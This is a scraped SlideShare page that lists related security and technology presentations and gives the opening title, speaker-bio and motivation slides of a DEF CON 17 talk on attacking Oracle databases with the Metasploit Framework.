Authentication(pswrd,token,certificate,biometric)
Authentication(pswrd,token,certificate,biometric)Authentication(pswrd,token,certificate,biometric)
Authentication(pswrd,token,certificate,biometric)Ali Raw
 
Metasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkMetasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkRob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Can K.
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıBGA Cyber Security
 

En vedette (20)

mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfws
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Oracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsOracle Database 12c Attack Vectors
Oracle Database 12c Attack Vectors
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JS
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?
 
Web Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWeb Application Security 101 - 06 Authentication
Web Application Security 101 - 06 Authentication
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015
 
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
 
Authentication(pswrd,token,certificate,biometric)
Authentication(pswrd,token,certificate,biometric)Authentication(pswrd,token,certificate,biometric)
Authentication(pswrd,token,certificate,biometric)
 
Metasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkMetasploit magic the dark coners of the framework
Metasploit magic the dark coners of the framework
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
 

Similaire à Attacking Oracle with the Metasploit Framework

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time OptimizationKan-Ru Chen
 
EM12C High Availability without SLB and RAC
EM12C High Availability without SLB and RACEM12C High Availability without SLB and RAC
EM12C High Availability without SLB and RACSecure-24
 
0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft
0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft
0x002 - Windows Priv Esc - A Low Level Explanation of Token TheftRussell Sanford
 
0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft
0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft
0x02 - Windows Privilege Esc - A Low Level Explanation of Token TheftRussell Sanford
 
Monitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapMonitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapPadraig O'Sullivan
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersMichael Smith
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - FalconerTony Godfrey
 
Weave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapWeave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapPatrick Chanezon
 
Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerunidsecconf
 
CoreOS, or How I Learned to Stop Worrying and Love Systemd
CoreOS, or How I Learned to Stop Worrying and Love SystemdCoreOS, or How I Learned to Stop Worrying and Love Systemd
CoreOS, or How I Learned to Stop Worrying and Love SystemdRichard Lister
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Practical Tips for Novell Cluster Services
Practical Tips for Novell Cluster ServicesPractical Tips for Novell Cluster Services
Practical Tips for Novell Cluster ServicesNovell
 

Similaire à Attacking Oracle with the Metasploit Framework (20)

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time Optimization
 
EM12C High Availability without SLB and RAC
EM12C High Availability without SLB and RACEM12C High Availability without SLB and RAC
EM12C High Availability without SLB and RAC
 
0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft
0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft
0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft
 
0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft
0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft
0x02 - Windows Privilege Esc - A Low Level Explanation of Token Theft
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Ansible101
Ansible101Ansible101
Ansible101
 
Linux Device Driver’s
Linux Device Driver’sLinux Device Driver’s
Linux Device Driver’s
 
Monitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapMonitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTap
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO Routers
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
Technology to Stop Hackers
Technology to Stop Hackers Technology to Stop Hackers
Technology to Stop Hackers
 
Weave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapWeave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 Recap
 
Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerun
 
MySQL JSON Functions
MySQL JSON FunctionsMySQL JSON Functions
MySQL JSON Functions
 
CoreOS, or How I Learned to Stop Worrying and Love Systemd
CoreOS, or How I Learned to Stop Worrying and Love SystemdCoreOS, or How I Learned to Stop Worrying and Love Systemd
CoreOS, or How I Learned to Stop Worrying and Love Systemd
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
Practical Tips for Novell Cluster Services
Practical Tips for Novell Cluster ServicesPractical Tips for Novell Cluster Services
Practical Tips for Novell Cluster Services
 

Plus de Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVChris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010Chris Gates
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 

Plus de Chris Gates (20)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 

Dernier

Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Jeffrey Haguewood
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Dernier (20)

Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

Attacking Oracle with the Metasploit Framework

  • 1. Attacking Oracle with the Metasploit Framework defcon 17
  • 2. Who Are We? Chris Gates <cg [@] metasploit.com> What pays the bills Pentester/Security Consultant Security Blogger http://carnal0wnage.attackresearch.com Security Twit Carnal0wnage Want more? Chris Gates + carnal0wnage + maltego 
  • 3. Who Are We? Mario Ceballos <mc [@] metasploit.com> What do I do? Vulnerability Research/Exploit Development. Metasploit Framework Developer. Focus is on auxiliary and exploit modules. Pentesting for some company.
  • 5. Why Oracle? Why the focus on Oracle? Been on lots of pentests & seen lots of potential targets. The Oracle business model allows for free downloads of products, but you pay for updates. The result is tons of potential shells. Privilege escalation and data theft is pretty easy, but shells are always better.
